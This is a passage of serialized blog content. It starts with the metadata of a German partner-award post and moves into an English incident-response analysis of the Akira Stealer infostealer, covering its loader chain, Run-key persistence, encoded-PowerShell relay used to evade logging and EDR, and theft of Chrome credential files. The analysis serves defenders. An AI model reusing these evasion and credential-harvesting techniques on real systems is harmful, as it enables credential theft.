wie sich moderne IT-Strategien nachhaltig skalieren lassen.",[806,6522,6523,6524,2786],{},"Die vollständige Liste aller ausgezeichneten Projekte findet sich ",[833,6525,6528],{"href":6526,"rel":6527},"https://aka.ms/2025POTYAWinnersFinalists",[1410],"hier",{"title":863,"searchDepth":864,"depth":864,"links":6530},[6531,6532,6533,6534],{"id":6461,"depth":864,"text":6462},{"id":6473,"depth":864,"text":6474},{"id":6505,"depth":864,"text":6506},{"id":6514,"depth":864,"text":6515},{"seoTitle":6536,"titleClass":873,"date":6537,"categories":6538,"blogtitlepic":6539,"socialimg":6540,"customExcerpt":6541,"keywords":6542,"contactInContent":6543,"hreflang":6570,"scripts":6575,"quoteMicrosoft":6576},"Cloud-first am Flughafen: Ausgezeichnet bei den Microsoft Partner of the Year Awards 2025","2025-11-12",[876],"head-partner-of-the-year-2025","/heads/head-partner-of-the-year-2025.jpg","Mehr als 4.600 Nominierungen aus über 100 Ländern und mittendrin ein Projekt, das zeigt, wie moderne IT aussehen kann: Gemeinsam mit Fraport wurde glueckkanja bei den Microsoft Partner of the Year Awards 2025 in der Kategorie Cloud Endpoints ausgezeichnet.","Microsoft Partner of the Year Awards 2025, Cloud Endpoints Award, glueckkanja Fraport, Fraport Microsoft Fallstudie, Windows 365 Cloud PC, Microsoft Intune Suite, Cloud Managed Workplace, Azure Cloud Migration, Zero Trust Sicherheit, Modern Workplace, Cloud-first Strategie, Digitale Arbeitsplatztransformation, Endpoint Management, Automatisierte Gerätebereitstellung, Sichere Cloud-Infrastruktur, Skalierbare IT-Architektur, Cloud Governance und Compliance, Enterprise Mobility und Security, IT-Infrastruktur im Flughafen, Digitale Transformation in der Luftfahrt, IT für kritische Infrastrukturen, Globale IT-Operationen, Remote Work Enablement, IT-Modernisierung im Transportwesen, Cloud-basierter Arbeitsplatz für kritische Infrastrukturen, Microsoft Windows 365 und Intune in Unternehmen, Sichere und skalierbare Endpoint-Verwaltung, Transformation von Flughafen-IT mit Azure",{"quote":508,"infos":6544},{"bgColor":883,"color":884,"boxBgColor":761,"boxColor":884,"headline":6545,"subline":6546,"level":810,"textStyling":887,"flush":888,"person":6547,"form":6554},"Jetzt Kontakt aufnahmen","Ihr möchtet mehr über das Projekt und unsere Auszeichnung erfahren? Wir zeigen euch gerne, wie der Weg zur standardisierten Cloud-Architektur bei Fraport umgesetzt wurde.",{"image":6548,"cloudinary":508,"alt":1112,"name":1112,"quotee":1112,"quoteeTitle":6549,"quote":6550,"detailsHeader":895,"details":6551},"/people/people-christian-kanja.jpg","CEO","Das Projekt mit Fraport zeigt, wie sich durch Standardisierung und Automatisierung ein sicheres, skalierbares Arbeitsplatzmodell umsetzen lässt. Genau das braucht es, um IT-Umgebungen langfristig stabil zu betreiben und weiterzuentwickeln.",[6552,6553],{"text":762,"href":898,"details":899,"icon":900},{"text":763,"href":902,"icon":903},{"ctaText":905,"cta":6555,"method":870,"action":908,"fields":6556},{"skin":907},[6557,6558,6559,6560,6561,6562,6563,6564,6565,6567,6568,6569],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":918},{"label":920,"type":916,"id":612,"required":508,"requiredMsg":921},{"label":923,"type":924,"id":924,"required":508,"requiredMsg":925},{"label":927,"type":928,"id":929,"required":749,"requiredMsg":930},{"label":932,"type":933,"id":934,"required":508,"requiredMsg":935},{"type":911,"id":937,"value":371},{"type":911,"id":939,"value":940},{"type":911,"id":942,"value":6566},"Form: Blog Microsoft Security Store | DE",{"type":911,"id":945,"value":946},{"type":911,"id":948},{"type":911,"id":950},[6571,6573],{"lang":953,"href":6572},"/en/posts/2025-11-12-partner-of-the-year-awards",{"lang":956,"href":6574},"/es/posts/2025-11-12-partner-of-the-year-awards",{"slick":508,"form":508},{"items":6577},[6578],{"text":6579,"name":6580,"company":6581,"alt":6580},"Durch den Wechsel zu Windows 365 Cloud PCs und zur Intune Suite haben wir ein neues Maß an Agilität und Sicherheit erreicht. Die Zusammenarbeit mit glueckkanja hat die Basis für zukünftige Innovationen gelegt.","Niklas Rast","Senior Solution Architect bei Fraport","/posts/2025-11-12-partner-of-the-year-awards",{"title":6455,"description":863},"posts/2025-11-12-partner-of-the-year-awards",[963,6586],"Partner of the Year","ZDJ1X4t39o2Sb_Bl-DmPog5FAKD_8eS-1svkEoSTjEo",{"id":6589,"title":6590,"author":6591,"body":6592,"cta":764,"description":816,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":18940,"moment":18942,"navigation":508,"path":19037,"seo":19038,"stem":19039,"tags":19040,"webcast":749,"__hash__":19043},"content_de/posts/2025-06-16-quiet-breach.md","Inside Akira Stealer: A full technical analysis of a modular stealer",[1231],{"type":803,"value":6593,"toc":18795},[6594,6598,6600,6607,6610,6627,6630,6647,6653,6656,6659,6680,6688,6699,6706,6709,6712,6727,6734,6737,6740,6752,6756,6758,6764,6768,6770,6773,6785,6794,6800,6803,6809,6812,6816,6818,6823,6829,6832,6836,6838,6841,6867,6872,6877,6881,6883,6886,6890,6892,6895,6897,6903,6906,6910,6912,6922,6925,6928,6948,6951,6958,6965,6967,6973,6976,6982,6985,7019,7022,7031,7037,7046,7049,7060,7063,7070,7072,7081,7091,7123,7129,7134,7155,7161,7164,7167,7173,7181,7188,7190,7193,7205,7208,7241,7247,7274,7283,7286,7291,7300,7302,7311,7317,7334,7337,7342,7376,7380,7383,7386,7392,7406,7412,7418,7420,7425,7429,7431,7505,7508,7512,7514,7519,7525,7530,7539,7544,7549,7560,7563,7568,7577,7583,7586,7590,7592,7603,7608,7627,7633,7642,7653,7660,7665,7669,7671,7677,7703,7706,7717,7720,7729,7732,7736,7738,7746,7749,7752,7765,7775,7782,7803,7806,7812,7816,7818,7821,7830,7842,7867,7873,7879,7882,7889,7892,7905,7912,7914,7921,7925,7927,7933,8031,8038,8045,8047,8050,8073,8076,8103,8106,8148,8151,8160,8163,8180,8186,8189,8198,8201,8215,8222,8226,8228,8235,8258,8265,8299,8302,8317,8324,8329,8340,8343,8347,8349,8352,8367,8374,8385,8396,8431,8438,8441,8445,8447,8453,8458,8498,8501,8516,8519,8528,8534,8537,8541,8543,8546,8555,8558,8605,8612,8616,8618,8624,8629,8658,8665,8667,8683,8687,8689,8692,8731,8737,8743,8747,8749,8768,8778,8785,8817,8824,8870,8878,8882,8884,8887,8915,8925,8932,8934,8939,8943,8945,8951,8955,8957,8964,8990,8997,9252,9255,9260,9263,9295,9300,9304,9306,9309,9313,9315,9318,9420,9423,9427,9429,9432,9594,9597,9620,9624,9626,9635,9876,9879,9908,9912,9914,9947,9950,9953,9984,9988,9990,9996,10001,10004,10021,10024,10032,10037,10040,10119,10127,10130,10136,10144,10148,10150,10156,10161,10164,10181,10188,10193,10200,10262,10275,10280,10286,10313,10316,10354,10357,10362,10365,10379,10383,10385,10390,10410,10417,10423,10425,10429,10431,10437,10441,10443,10447,10449,10454,10481,10487,10491,10493,10499,10516,10542,10549,10553,10555,10558,10567,10581,10584,10588,10590,10603,10606,10615,10620,10627,10629,10633,10635,10644,10648,10650,10655,10669,10684,10688,10690,10771,10774,10781,10783,10788,10846,10853,10979,10982,11127,11131,11133,11136,11190,11193,11197,11199,11206,11259,11262,11266,11268,11271,11323,11326,11330,11332,11339,11391,11394,11398,11400,11407,11448,11451,11455,11457,11464,11546,11549,11553,11555,11558,11605,11608,11613,11616,11619,11623,11625,11630,11636,11641,11647,11652,11658,11663,11669,11674,12075,12079,12081,12122,12126,12128,12136,12140,12142,12152,12157,12182,12203,12208,12295,12299,12301,12394,12397,12403,12410,12412,12415,12470,12525,12532,12534,12537,12572,12607,12614,12616,12619,12652,12687,12694,12696,12699,12768,12814,12821,12823,12826,12854,12884,12891,12893,12896,12924,12947,12957,12959,12962,12987,13025,13029,13031,13064,13068,13070,13073,13076,13079,13082,13085,13090,13115,13120,13150,13156,13165,13187,13396,13400,13402,13409,13507,13510,13514,13516,13523,13616,13626,13632,13635,13640,13646,13674,13679,13709,13762,13781,13784,13789,13838,13842,13844,13847,13851,13853,13859,13979,13998,14002,14004,14009,14083,14104,14108,14110,14113,14116,14119,14122,14221,14229,14233,14235,14240,14275,14296,14300,14302,14305,14308,14316,14319,14407,14421,14425,14427,14430,14433,14526,14532,14534,14540,14544,14546,14549,14614,14631,14634,14668,14671,14675,14677,14682,14695,14740,14766,14771,14783,14859,14914,14918,14920,14923,14929,14969,14979,14985,14995,14999,15001,15004,15033,15059,15065,15069,15071,15078,15085,15087,15093,15148,15176,15180,15182,15185,15250,15257,15296,15300,15302,15308,15323,15326,15361,15365,15367,15374,15418,15432,15438,15445,15447,15450,15454,15456,15459,15493,15496,15521,15525,15527,15532,15535,15559,15583,15587,15589,15592,15616,15620,15622,15625,15645,15649,15651,15654,15661,15774,15779,15824,15828,15830,15836,15870,15924,15929,15932,15936,15938,15941,15945,15947,15950,15956,15960,15962,15965,16020,16035,16039,16041,16052,16121,16130,16135,16138,16182,16184,16188,16190,16193,16283,16288,16417,16421,16423,16426,16431,16504,16522,16527,16547,16555,16560,16566,16581,16598,16604,16662,16680,16685,16702,16707,16751,16765,16768,16772,16774,16779,16783,16785,16792,16799,16803,16805,16916,16923,16927,16929,16935,16940,17020,17027,17034,17038,17040,17043,17072,17079,17083,17085,17089,17091,17098,17101,17104,17107,17250,17253,17257,17259,17262,17266,17268,17271,17306,17312,17316,17318,17321,17347,17350,17356,17360,17362,17367,17384,17390,17394,17396,17400,17402,17418,17442,17449,17465,17484,17487,17491,17493,17504,17508,17510,17944,17947,17951,17953,17959,17962,17965,17971,17974,17985,17991,17994,17999,18003,18005,18008,18013,18027,18031,18033,18330,18333,18337,18339,18451,18454,18458,18460,18514,18517,18521,18523,18686,18689,18693,18695,18736,18739,18743,18745,18748,18751,18754,18757,18760,18763,18768,18772,18774,18777,18780,18783,18786,18789,18792],[1511,6595,6597],{"id":6596},"prologue","Prologue",[806,6599,816],{},[806,6601,6602,6603,6606],{},"It started like so many modern attacks do: quietly. A low-confidence Defender alert — ",[1736,6604,6605],{},"\"Suspicious sequence of exploration activities\""," — surfaced during onboarding phase of a new customer into our glueckkanja Cyber Security Operations Center (CSOC).",[806,6608,6609],{},"There were no signature hits. No malware classifications. No real-time protection response. Just a single behavioral correlation in Microsoft 365 Defender, buried in the noise — and yet, unmistakably wrong.",[806,6611,6612,6613,6616,6617,5611,6620,6623,6624],{},"While triaging the alert, one specific action caught my attention: ",[1524,6614,6615],{},"python.exe"," had accessed both the ",[1524,6618,6619],{},"Login Data",[1524,6621,6622],{},"Web Data"," files inside a Chromium profile. Microsoft Defender immediately escalated this to a high-severity incident — ",[1736,6625,6626],{},"\"Possible theft of passwords and other sensitive web browser information.\"",[806,6628,6629],{},"This wasn’t a false positive. It was the tip of something deeper.",[806,6631,6632,6633,6636,6637,6640,6641,6644,6645,2786],{},"Tracing the telemetry backwards, I uncovered a generic startup-located binary — ",[1524,6634,6635],{},"Updater.exe"," — which spawned a NodeJS-based wrapper (",[1524,6638,6639],{},"main.exe",") that executed a command line to run a script named ",[1524,6642,6643],{},"astor.py"," via ",[1524,6646,6615],{},[1545,6648,6651],{"className":6649,"code":6650,"language":916,"meta":863},[1548],"Updater.exe → main.exe → cmd.exe → python.exe Crypto\\Util\\astor.py\n",[1524,6652,6650],{"__ignoreMap":863},[806,6654,6655],{},"The script didn’t just scrape credentials — it executed a sequence of post-compromise reconnaissance steps, including registry queries, system fingerprinting, and privilege-aware enumeration. It operated with surgical precision, mimicking native system behavior to evade detection. And it worked — almost.",[806,6657,6658],{},"At the time of first response:",[2738,6660,6661,6670,6677],{},[2741,6662,6663,6665,6666,6669],{},[1524,6664,6635],{}," was flagged by only ",[1736,6667,6668],{},"1 out of 69"," engines on VirusTotal.",[2741,6671,6672,2289,6674,6676],{},[1524,6673,6639],{},[1524,6675,6643],{},", and all associated components were not really flagged on VirusTotal.",[2741,6678,6679],{},"No files were signed. No elevated context. Just \"ordinary\" processes doing very non-ordinary things.",[806,6681,6682,6684,6685,6687],{},[1524,6683,6635],{}," didn’t touch credentials. That task was reserved for ",[1524,6686,6643],{},", the in-memory Python payload — a file that, by design, left almost no trace.",[806,6689,6690,6691,6694,6695,6698],{},"Within ",[1736,6692,6693],{},"21 minutes",", the affected system was isolated from the network. Within ",[1736,6696,6697],{},"70 minutes",", credentials were rotated across all affected scopes: internal identities, SaaS platforms, third-party services.",[806,6700,6701,6702,6705],{},"But the real turning point came when we extracted and fully decrypted the Python payload. What we found was not a generic stealer — it was a custom deployment of ",[1736,6703,6704],{},"Akira Stealer v2",", a commercially distributed malware family sold via Telegram.",[806,6707,6708],{},"Thanks to our in-house threat intelligence and reverse engineering capabilities, we were able to reconstruct the full functionality of the malware, extract all embedded indicators, and understand its staging, exfiltration, and credential targeting logic in detail.",[806,6710,6711],{},"More importantly — we didn’t stop at technical attribution. We went further.",[806,6713,6714,6715,6718,6719,6722,6723,6726],{},"We were able to provide the client with a ",[1736,6716,6717],{},"complete dataset of exfiltrated credentials",": over ",[1736,6720,6721],{},"100 unique username-password combinations",", including access credentials to cloud services, CRM systems, internal platforms, and even personal tools used by key employees. The theft had been ongoing for ",[1736,6724,6725],{},"months"," — and we could account for all of it.",[806,6728,6729,6730,6733],{},"Using insights gained from this case, we built a ",[1736,6731,6732],{},"post-infection analysis tool"," that scans affected systems, reconstructs credential access patterns, and generates detailed forensic reports — mapping exactly what was stolen, when, and from where.",[806,6735,6736],{},"We’ll share a glimpse of that scanner at the end of this report.",[806,6738,6739],{},"Because this is more than just an incident.\nThis is how we investigate. This is how we protect.",[806,6741,6742,6749,6751],{},[1736,6743,6744,6745,2786],{},"Welcome to the ",[833,6746,6748],{"href":6747},"/en/security/cloud-security-operations-center/","glueckkanja CSOC",[2016,6750],{},"\nThis is how we work — because breaches don't wait.",[1511,6753,6755],{"id":6754},"_1-initial-event-and-triage-summary","1. Initial Event and Triage Summary",[806,6757,816],{},[806,6759,6760,6761,6763],{},"On March 31, 2025, Microsoft Defender for Endpoint generated an alert labeled ",[1736,6762,6605],{}," on a Windows 10 64-bit endpoint. I began the triage based on this signal and reviewed the affected system using the process tree, system timeline, and evidence correlated by Defender.",[810,6765,6767],{"id":6766},"_11-timeline-based-triage","1.1 Timeline-Based Triage",[806,6769,1536],{},[806,6771,6772],{},"The alert pointed to a sequence of processes that warranted further inspection. During initial review, I observed the following access patterns to Chrome browser data within the local user profile:",[2738,6774,6775,6780],{},[2741,6776,6777],{},[1524,6778,6779],{},"%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data",[2741,6781,6782],{},[1524,6783,6784],{},"%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Web Data",[806,6786,6787,6788,6790,6791,6793],{},"These accesses were initiated by a process named ",[1524,6789,6635],{},". While Microsoft Defender had not flagged the binary based on heuristic or behavioral analysis, I found a detection for ",[1524,6792,6635],{}," on VirusTotal — flagged by a single engine at that point in time.",[806,6795,6796],{},[1449,6797],{"alt":6798,"src":6799},"Microsoft Defender","https://res.cloudinary.com/c4a8/image/upload/v1749797184/blog/pics/microsoft-defender.png",[806,6801,6802],{},"The full observed execution chain was as follows:",[1545,6804,6807],{"className":6805,"code":6806,"language":916,"meta":863},[1548],"winlogon.exe\n└── userinit.exe\n └── explorer.exe\n └── Updater.exe\n └── main.exe\n └── cmd.exe /d /s /c \"python.exe Crypto\\Util\\astor.py\"\n └── python.exe Crypto\\Util\\astor.py\n",[1524,6808,6806],{"__ignoreMap":863},[806,6810,6811],{},"At this stage, no deeper static or dynamic analysis of the involved files had been performed. My focus was on understanding the high-level behavior and context. The process names and file paths were generic, and no suspicious command-line arguments were present beyond the chained Python execution.",[810,6813,6815],{"id":6814},"_12-initial-response","1.2 Initial Response",[806,6817,1536],{},[806,6819,6690,6820,6822],{},[1736,6821,6693],{}," of the initial alert, I initiated host isolation using Defender for Endpoint’s isolation features. The goal was to prevent potential further spread or exfiltration.",[806,6824,6825,6826,6828],{},"Within the first ",[1736,6827,6697],{},", we proceeded to rotate credentials that were known to be used on the affected host — covering internal systems, SaaS platforms, and critical third-party vendors.",[806,6830,6831],{},"The reverse engineering process began after the first containment. The following sections document the technical deep dive that followed to investigate the breach.",[810,6833,6835],{"id":6834},"_13-response-summary-fast-transparent-impact-driven","1.3 Response Summary – Fast, Transparent, Impact-Driven",[806,6837,1536],{},[806,6839,6840],{},"Our response combined speed, expertise, and operational excellence—backed by proven workflows and full visibility for the customer.",[2738,6842,6843,6849,6855,6861],{},[2741,6844,6845,6848],{},[1736,6846,6847],{},"Detection to full containment in under 90 minutes","\nDefender alerts, network isolation, antivirus scan, and credential revocation executed rapidly and in concert.",[2741,6850,6851,6854],{},[1736,6852,6853],{},"Deep-dive forensic response within 48 hours","\nIncluding full disk and memory analysis, browser artifact review, credential dumping detection, and behavioral reconstruction of attacker activity.",[2741,6856,6857,6860],{},[1736,6858,6859],{},"Secure data recovery & evidence handling","\nThe stolen data—including cookies, passwords, tokens, and browser profiles—was recovered, forensically archived, and handed off securely to the customer.",[2741,6862,6863,6866],{},[1736,6864,6865],{},"End-to-end visibility and communication","\nEvery step—from first alert to remediation and debrief—was fully documented, shared in real time, and summarized in a structured CSIRT handover.",[3587,6868,6869],{},[806,6870,6871],{},"This incident showcases how glueckkanja CSOC doesn’t just stop malware—we dismantle its effects, restore control to our customers, and turn every incident into insight.",[1541,6873],{"className":6874},[6875,6876],"space-top-1","space-bottom-1",[1511,6878,6880],{"id":6879},"_2-malware-architecture-and-execution-chain-overview","2. Malware Architecture and Execution Chain Overview",[806,6882,816],{},[806,6884,6885],{},"The malware observed on the affected endpoint followed a structured, multi-stage architecture with clear separation of responsibilities: deployment, decoding, execution, and data exfiltration.",[810,6887,6889],{"id":6888},"_21-execution-chain-overview","2.1 Execution Chain Overview",[806,6891,1536],{},[806,6893,6894],{},"The observed execution flow was as follows:",[806,6896,6635],{},[1545,6898,6901],{"className":6899,"code":6900,"language":916},[1548],"​ └── main.exe\n​ └── cmd.exe\n​ └── python.exe astor.py\n",[1524,6902,6900],{"__ignoreMap":863},[806,6904,6905],{},"Each component in the chain contributed to stealth, modularity, and evasion. The architecture leveraged legitimate runtimes and standard OS interpreters to bypass detection mechanisms.",[1671,6907,6909],{"id":6908},"_211-origin-uncertainty-missing-initial-vector","2.1.1 Origin Uncertainty: Missing Initial Vector",[806,6911,1677],{},[806,6913,6914,6915,6918,6919,2786],{},"Despite extensive analysis of the post-compromise environment, the initial access vector could not be conclusively determined. This uncertainty stems primarily from the fact that the malware had remained active for an estimated ",[1736,6916,6917],{},"six months prior to detection"," — exceeding the ",[1736,6920,6921],{},"log retention period enforced by Microsoft Defender for Endpoint",[806,6923,6924],{},"As a result, no telemetry or forensic artifacts were available from the original time of infection. No initial process creation events, file drops, or command-line entries related to the delivery stage were recoverable from Defender’s timeline or associated sensors.",[806,6926,6927],{},"Based on contextual indicators and OSINT sources, a likely infection vector may have involved:",[2738,6929,6930,6936,6942],{},[2741,6931,6932,6935],{},[1736,6933,6934],{},"Trojanized installers"," of cracked or modded gaming software",[2741,6937,6938,6941],{},[1736,6939,6940],{},"Fake utilities"," or \"performance boosters\" distributed via forums and third-party sites",[2741,6943,6944,6947],{},[1736,6945,6946],{},"Malicious browser extensions"," targeting specific user interests (e.g., crypto-related tools or Discord enhancements)",[806,6949,6950],{},"However, these remain speculative.",[806,6952,6953,6954,6957],{},"No confirmed dropper, phishing email, or compromised website could be identified during the investigation. While the malware architecture and execution chain were fully reconstructed, the ",[1736,6955,6956],{},"initial point of compromise (MITRE ATT&CK T1190 / T1566)"," could not be validated.",[1671,6959,6961,6962,6964],{"id":6960},"_212-updaterexe-initial-loader","2.1.2 ",[1524,6963,6635],{}," – Initial Loader",[806,6966,1677],{},[806,6968,6969,6970,6972],{},"When reviewing the process tree in Microsoft 365 Defender, ",[1524,6971,6635],{}," stood out immediately — not because of what it did, but because of how silently it embedded itself into the system’s execution flow.",[806,6974,6975],{},"This binary was registered for automatic execution via the standard Windows Run key:",[1545,6977,6980],{"className":6978,"code":6979,"language":916},[1548],"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n",[1524,6981,6979],{"__ignoreMap":863},[806,6983,6984],{},"That meant it would launch every time the user logged into their session — a classic persistence mechanism that requires no elevated privileges and often slips through unnoticed in EDR telemetry.",[2738,6986,6987,6993,6999,7005,7011],{},[2741,6988,6989,6992],{},[1736,6990,6991],{},"File Type",": Windows PE executable (32-bit)",[2741,6994,6995,6998],{},[1736,6996,6997],{},"Signature",": Unsigned",[2741,7000,7001,7004],{},[1736,7002,7003],{},"VirusTotal Detection",": 1 out of 69 engines at the time of triage",[2741,7006,7007,7010],{},[1736,7008,7009],{},"Execution Context",": Medium integrity, user session",[2741,7012,7013,2545,7016],{},[1736,7014,7015],{},"Location",[1524,7017,7018],{},"AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\",[806,7020,7021],{},"The file itself was small, cleanly compiled, and unremarkable from a static analysis standpoint. No suspicious strings, no encrypted sections, and no indicators of obfuscation or packing. It imported only a minimal set of standard Windows API functions and contained no embedded payload.",[806,7023,7024,7025,7027,7028,7030],{},"However, its behavior was more telling. Once launched, ",[1524,7026,6635],{}," extracted an Electron application from a bundled archive — a self-contained NodeJS runtime packaged using standard Electron tooling. This unpacked folder contained an executable named ",[1524,7029,6639],{},", which was subsequently launched as a child process.",[1545,7032,7035],{"className":7033,"code":7034,"language":916,"meta":863},[1548],"Updater.exe → main.exe\n",[1524,7036,7034],{"__ignoreMap":863},[806,7038,7039,7040,7042,7043,7045],{},"There were no network indicators at this stage, no process injection, and no anomaly in privileges or token elevation. The entire role of ",[1524,7041,6635],{}," appeared to be that of a loader — delivering a second-stage component (",[1524,7044,6639],{},") into the environment, likely with the goal of maintaining stealth and modularity.",[806,7047,7048],{},"This kind of architectural separation is common in modern commodity malware and stealer toolkits. The initial loader acts merely as a deployment stub, allowing the heavier logic — often obfuscated, interpreted, or dynamically generated — to be contained in later stages.",[806,7050,7051,7052,7054,7055,7057,7058,2786],{},"In this case, ",[1524,7053,6635],{}," served precisely that purpose: a quiet initial foothold designed to blend in, remain undetected, and pave the way for the execution of the actual stealer logic in ",[1524,7056,6639],{}," and eventually ",[1524,7059,6643],{},[806,7061,7062],{},"It didn’t touch the file system beyond its own directory and didn’t trigger any behavioral rules — and yet, it was the first domino in a long and carefully constructed attack chain.",[1671,7064,7066,7067,7069],{"id":7065},"_213-mainexe-obfuscated-nodejs-payload-container","2.1.3 ",[1524,7068,6639],{}," – Obfuscated NodeJS Payload Container",[806,7071,1677],{},[806,7073,7074,7075,7077,7078,7080],{},"Following the execution of ",[1524,7076,6635],{},", a second-stage binary named ",[1524,7079,6639],{}," was launched. This component presented itself as a standard Electron application — a runtime environment bundling Node.js and Chromium, often used for cross-platform desktop apps. Its innocuous nature is part of what makes it so dangerous in the wrong hands.",[806,7082,7083,7084,7086,7087,7090],{},"Upon inspection, ",[1524,7085,6639],{}," contained an internal archive named ",[1524,7088,7089],{},"app.asar"," — the standard packaging format for Electron-based applications. Unlike legitimate Electron apps, however, the contents of this archive were anything but ordinary.",[2738,7092,7093,7099,7105,7113],{},[2741,7094,7095,7098],{},[1736,7096,7097],{},"Platform",": Electron (Node.js + Chromium)",[2741,7100,7101,7104],{},[1736,7102,7103],{},"Architecture",": 64-bit Windows",[2741,7106,7107,7110,7111],{},[1736,7108,7109],{},"Content Structure",": Embedded JavaScript files within ",[1524,7112,7089],{},[2741,7114,7115,7118,7119,7122],{},[1736,7116,7117],{},"Obfuscation Level",": High — achieved through ",[1524,7120,7121],{},"js-confuser",", a commercially available obfuscation toolkit for JavaScript",[806,7124,7125,7126,7128],{},"Once decompiled and deobfuscated, the core logic of ",[1524,7127,6639],{}," became evident. Its purpose was not to present a GUI or execute any frontend logic — instead, it acted as a hidden execution orchestrator.",[806,7130,7131],{},[1736,7132,7133],{},"Observed Behavior:",[2738,7135,7136,7139,7146],{},[2741,7137,7138],{},"Decrypts and reconstructs a Base64-encoded PowerShell command stored within the JavaScript payload",[2741,7140,7141,7142,7145],{},"Spawns ",[1524,7143,7144],{},"cmd.exe"," to execute the PowerShell command inline",[2741,7147,7148,7149,7151,7152,2772],{},"The PowerShell command in turn invokes ",[1524,7150,6615],{},", passing in a script located under a seemingly benign directory structure (",[1524,7153,7154],{},"Crypto\\Util\\astor.py",[1545,7156,7159],{"className":7157,"code":7158,"language":916,"meta":863},[1548],"main.exe → cmd.exe /d /s /c powershell → python.exe Crypto\\Util\\astor.py\n",[1524,7160,7158],{"__ignoreMap":863},[806,7162,7163],{},"This chaining allowed the attacker to shift execution contexts and evade straightforward detection. Because the payload was obfuscated and staged in-memory, traditional signature-based controls were ineffective.",[806,7165,7166],{},"The Electron framework provided an ideal cover — allowing execution of arbitrary JavaScript while avoiding scrutiny. JavaScript-based execution also introduced cross-platform compatibility, allowing for flexible deployment and easier integration of dynamic control logic.",[806,7168,7169,7170,7172],{},"What made ",[1524,7171,6639],{}," particularly dangerous was its ability to operate without dropping any additional files beyond what had already been staged. The stealer script was invoked directly from disk, but all staging and execution logic remained embedded within the Electron bundle.",[806,7174,7175,7176,7178,7179,2786],{},"In summary, ",[1524,7177,6639],{}," served as the obfuscated, multi-layered execution core — acting as the gatekeeper between initial persistence and the full activation of the Akira Stealer payload in ",[1524,7180,6643],{},[1671,7182,7184,7185,7187],{"id":7183},"_214-cmdexe-powershell-relay","2.1.4 ",[1524,7186,7144],{}," & PowerShell Relay",[806,7189,1677],{},[806,7191,7192],{},"This stage of the execution chain functioned as a relay — not for payload logic, but for obfuscation and indirection.",[806,7194,7195,7196,7198,7199,7201,7202,2786],{},"After ",[1524,7197,6639],{}," completed its role of unpacking and decoding the payload, it spawned a ",[1524,7200,7144],{}," process. This process did not contain any malicious logic itself, nor did it write or modify files. Its sole purpose was to serve as a wrapper for launching a PowerShell session with an ",[1736,7203,7204],{},"encoded command",[806,7206,7207],{},"This method is a well-known tactic used to reduce visibility and avoid detection:",[2738,7209,7210,7221],{},[2741,7211,7212,3034,7215],{},[1736,7213,7214],{},"Execution Chain",[1545,7216,7219],{"className":7217,"code":7218,"language":916},[1548],"main.exe → cmd.exe /d /s /c \"powershell -EncodedCommand \u003CBase64Payload>\"\n",[1524,7220,7218],{"__ignoreMap":863},[2741,7222,7223,3034,7226],{},[1736,7224,7225],{},"Purpose",[2738,7227,7228,7231,7234],{},[2741,7229,7230],{},"Encapsulates PowerShell execution within an additional shell",[2741,7232,7233],{},"Hides the actual PowerShell code from direct visibility in logs",[2741,7235,7236,7237,7240],{},"Evades EDRs that trigger on direct ",[1524,7238,7239],{},"powershell.exe"," usage with suspicious parameters",[806,7242,7243,7244,7246],{},"By embedding the PowerShell script as a Base64-encoded string and invoking it through ",[1524,7245,7144],{},", the attacker avoided multiple forms of detection:",[2738,7248,7249,7254,7259],{},[2741,7250,7251],{},[1736,7252,7253],{},"Command-line heuristic filters",[2741,7255,7256],{},[1736,7257,7258],{},"Standard logging (e.g., Event ID 4104, 4688)",[2741,7260,7261],{},[1736,7262,7263,7264,7266,7267,2289,7270,7273],{},"Rule-based detections for ",[1524,7265,7239],{}," arguments like ",[1524,7268,7269],{},"-NoProfile",[1524,7271,7272],{},"-ExecutionPolicy Bypass",", or inline scripts",[806,7275,7276,7277,7279,7280,7282],{},"Notably, the PowerShell command was kept minimal and solely focused on launching ",[1524,7278,6615],{}," with a path to the embedded stealer script — ",[1524,7281,6643],{},". No additional modules were loaded, and no obvious signatures were present in memory.",[806,7284,7285],{},"This relay technique is often used in red teaming and by sophisticated infostealers alike — serving as a lightweight evasion layer that’s easy to implement but hard to catch without telemetry correlation.",[806,7287,7051,7288,7290],{},[1524,7289,7144],{}," served exactly that purpose: a simple, silent bridge between JavaScript logic and Python execution — one that almost slipped through unnoticed.",[1671,7292,7294,7295,7297,7298],{"id":7293},"_215-pythonexe-with-astorpy","2.1.5 ",[1524,7296,6615],{}," with ",[1524,7299,6643],{},[806,7301,1677],{},[806,7303,7304,7305,7307,7308,7310],{},"The final and most impactful stage of the execution chain was reached when ",[1524,7306,6615],{}," invoked ",[1524,7309,6643],{}," — a Python-based, modular infostealer operating entirely in memory. This script represented the operational core of the entire attack chain.",[806,7312,7313,7314,7316],{},"Unlike many commodity stealers, ",[1524,7315,6643],{}," was not deployed in plaintext. It was protected by a multi-layered decryption mechanism:",[2738,7318,7319,7328],{},[2741,7320,7321,7324,7325,2786],{},[1736,7322,7323],{},"Decryption Stack",": The file was first GZIP-compressed and then encrypted using ",[1736,7326,7327],{},"AES-256-CBC",[2741,7329,7330,7333],{},[1736,7331,7332],{},"Key Derivation",": A PBKDF2-based key derivation process was used (SHA-512, 1,000,000 iterations), making static analysis and brute-forcing highly impractical.",[806,7335,7336],{},"Once decrypted at runtime, the script executed several specialized modules, all targeting sensitive data sources:",[806,7338,7339],{},[1736,7340,7341],{},"Core Capabilities",[2738,7343,7344,7350,7360,7370],{},[2741,7345,7346,7349],{},[1736,7347,7348],{},"Browser Data Extraction",": Retrieved login credentials, cookies, and autofill data from Chromium-based browsers (Chrome, Edge, Brave, Opera)",[2741,7351,7352,7355,7356,7359],{},[1736,7353,7354],{},"Token Harvesting",": Collected session tokens, particularly from ",[1736,7357,7358],{},"Discord",", and scanned for cryptocurrency wallet extensions",[2741,7361,7362,7365,7366,7369],{},[1736,7363,7364],{},"Data Packaging",": Aggregated all harvested data into a structured ",[1736,7367,7368],{},"ZIP archive",", preserving directory and file context for attacker-side parsing",[2741,7371,7372,7375],{},[1736,7373,7374],{},"Exfiltration",": Uploaded the resulting archive to public APIs and infrastructure.",[806,7377,7378],{},[1736,7379,7009],{},[806,7381,7382],{},"The 